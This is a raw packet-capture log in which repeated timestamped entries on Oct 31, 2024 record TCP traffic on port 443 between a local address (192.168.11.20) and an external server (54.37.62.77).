                                                                                                                                                                                                  Oct 31, 2024 18:05:24.512415886 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.512641907 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.528526068 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.528587103 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.528796911 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.528841972 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.529206038 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.531296968 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.531374931 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.532145977 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.532145977 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.532212019 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.532516956 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.533271074 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.537667990 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.537740946 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.538853884 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.538853884 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.538921118 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.539791107 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.541220903 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.541277885 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.541470051 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.541635036 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.541697025 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.541908026 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.544008017 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.544065952 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.544202089 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.544202089 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.544249058 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.544270992 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.544302940 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.544493914 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.546219110 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.546274900 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.546437025 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.546562910 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.546627045 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.546835899 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.547348022 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.547403097 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.547533989 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.547533989 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.547590971 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.547590971 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.547590971 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.547630072 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.547804117 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.548305988 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.548361063 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.548513889 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.548513889 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.548562050 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.548562050 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.548562050 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.548595905 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.548830032 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.549345016 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.549401045 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.549535036 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.549535990 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.549591064 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.549592018 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.549623013 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.549786091 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.550122023 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.550169945 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.550307989 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.550369024 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.550369024 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.550405979 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.550581932 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.550967932 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.551012993 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.551140070 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.551140070 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.551187038 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.551187038 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.551211119 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.551248074 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.551354885 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.552165985 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.552210093 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.552320957 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.552364111 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.552364111 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.552390099 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.552460909 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.552539110 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.598016977 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.598030090 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.598191023 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.598388910 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.598398924 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.598540068 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.600652933 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.600665092 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.600881100 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.600893974 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.600955963 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.601103067 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.632908106 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.632920980 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.672282934 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.672282934 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.672405958 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.676148891 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.676161051 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.676325083 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.676325083 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.676400900 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.676414967 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.676424026 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.676424026 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.676593065 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.677000999 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.677012920 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.677232981 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.677232981 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.677242994 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.677253962 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.677427053 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.678081989 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.678092957 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.678272009 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.678272009 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.678283930 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.678364038 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.678467989 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.679325104 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.679337025 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.679553986 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.679554939 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.679563046 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.679617882 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.679723978 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.679929972 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.679939985 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.680079937 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.680124998 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.680130959 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.680172920 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.680236101 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.680236101 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.681063890 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.681075096 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.681207895 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.681207895 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.681307077 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.681307077 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.681313992 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.681353092 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.681451082 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.681821108 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.681830883 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.681977987 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.681977987 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.682022095 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.682025909 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.682075024 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.682075024 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.682224035 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.683063030 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.683073044 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.683197021 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.683244944 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.683244944 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.683250904 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.683296919 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.683342934 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.683392048 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.699703932 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.699717045 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.699906111 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.699906111 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.699924946 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.699932098 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.700032949 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.700139999 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.702035904 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.702048063 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.702238083 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.702238083 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.702253103 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.702259064 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.702332020 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.702332973 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.702455997 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.710664034 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.710676908 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.710894108 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.710894108 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.710894108 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.710907936 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.710916996 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.711189032 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.711889982 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.711903095 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.712125063 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.712125063 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.712140083 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.712152004 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.712337017 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.716059923 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.716073036 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.716300011 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.716300011 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.716300011 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.716300011 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.716315031 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.945676088 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.945713043 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.945771933 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.945772886 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.945822954 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.945868969 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.945898056 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.945928097 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.945929050 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.945962906 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.945993900 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946026087 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946026087 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946026087 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946137905 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946181059 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946204901 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946333885 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946365118 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946398973 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946436882 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946436882 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946436882 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946436882 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946481943 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946506023 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946547985 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946590900 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946590900 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946590900 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946641922 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946722031 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946739912 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946739912 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946787119 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946827888 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946876049 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946876049 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946935892 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946964979 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946979046 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946980000 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947139025 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947139978 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947165966 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947185040 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947185993 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947199106 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947284937 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947331905 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947331905 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947396040 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947428942 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947429895 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947475910 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947519064 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947566032 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947594881 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947594881 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947629929 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947663069 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947679043 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947707891 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947746992 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947788954 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947833061 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947833061 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947881937 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947881937 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947896957 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947931051 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947966099 CET4434975554.37.62.77192.168.11.20
